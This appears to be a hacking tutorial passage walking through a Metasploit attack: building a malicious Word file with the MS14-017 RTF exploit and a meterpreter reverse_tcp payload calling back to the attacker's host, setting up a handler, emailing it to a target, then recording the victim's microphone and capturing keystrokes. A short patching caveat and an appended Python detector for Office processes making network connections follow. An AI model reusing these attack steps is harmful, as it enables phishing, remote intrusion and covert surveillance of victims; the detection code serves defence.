STEP 1: Like the tampered APK in the Android exploit we did, you will have to find a way to compromise the target system. The most common way of doing this is sending an email with a document or a link. Embedded within it is a listener (rootkit) that will allow the hacker to gain access to the computer.
STEP 2: When the document is downloaded and the rootkit is, well, rooted, you will need to find a loophole or vulnerability that can be exploited. If you are lucky and the mark does not update his Windows system, then a few things will work, such as “MS14-017”, which allows remote code execution through Word and Office Web Apps.
Search Metasploit for this vulnerability, and you will find “exploit/windows/fileformat/ms14_017_rtf”. Use it by typing “use exploit/windows/fileformat/ms14_017_rtf”. After it loads, find out more about the exploit by typing “info”, then “show options”.
STEP 3: This exploit will work only against Office 2010. It is easy to use, though, as all you need to fill in is the filename. Set it with “set FILENAME <INSERT FILENAME>”.
STEP 4: Set the payload that will run from the file. Type “set PAYLOAD windows/meterpreter/reverse_tcp”. As before, set LHOST (your system’s IP) so the payload knows which device to call back. Then type “exploit”. This will create the tampered Word file.
STEP 5: Open up a multi-handler for the connection back. Simply type “use exploit/multi/handler” and “set PAYLOAD windows/meterpreter/reverse_tcp”. Finally, set LHOST to your IP.
STEP 6: Send the infected file to the mark. If you don’t have a clue how to do this, try Googling “email”.
STEP 7: As soon as the file is opened, a meterpreter session will be active. Now comes the juicy part: at the meterpreter prompt, try running “run sound_recorder -l /root”. This will turn on the mark’s microphone, save the recorded conversations to a file and send it to your /root directory. Easy peasy! And since you are using meterpreter, you can do pretty much anything except start a fire with the keyboard. Lots of meterpreter commands are available that will give you all sorts of data, all the way down to keystrokes. Again, now that you know how it is done, it should be a piece of cake to not fall victim. Always update your OS installation to take advantage of the latest security patches, and be careful of the things you download and open. If you are a Windows user, anti-virus software with rootkit detection ability can go a long way.
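The chain above (a booby-trapped Word file, a reverse TCP callback to LHOST, then a meterpreter session) leaves a footprint on the endpoint that an AV or EDR rule can catch: WINWORD.EXE opening an outbound network connection on its own, or spawning a child process it never launches during normal editing. As an added example, not code from the original post, here is a small Python routine that scans Sysmon-style process-create (event ID 1) and network-connect (event ID 3) records for exactly that; the event records are constructed samples in a simplified dict form, not real telemetry.

```python
from typing import Iterable, List

# Office images that should never initiate their own TCP sessions.
OFFICE_IMAGES = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
# Child processes Office launches legitimately (print spooler helper);
# anything else spawned by Word is treated as suspicious.
BENIGN_CHILDREN = {"splwow64.exe"}


def basename(path: str) -> str:
    """Last component of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def analyze(events: Iterable[dict]) -> List[str]:
    """Return one alert string per suspicious event, in input order."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 3 and basename(ev["Image"]).upper() in OFFICE_IMAGES:
            # A reverse_tcp stager calls home right after the document opens;
            # the destination port is irrelevant, the originating image is not.
            alerts.append(f"office-netconn {basename(ev['Image'])} -> "
                          f"{ev['DestinationIp']}:{ev['DestinationPort']}")
        elif ev["EventID"] == 1 and basename(ev["ParentImage"]).upper() in OFFICE_IMAGES:
            child = basename(ev["Image"])
            if child.lower() not in BENIGN_CHILDREN:
                alerts.append(f"office-child {basename(ev['ParentImage'])} -> {child}")
    return alerts


# Constructed sample events: one benign Word launch, one benign svchost
# connection, then Word calling out to a constructed RFC 5737 address and
# spawning cmd.exe. Paths use the Office 2010 (Office14) layout.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"},
]

if __name__ == "__main__":
    for line in analyze(SAMPLE_EVENTS):
        print(line)
```

Note that the Word connection to port 443 is still flagged: the signal is the originating process, not the port, which is why patching and a product that watches Office process behaviour matter more than a port-based firewall rule.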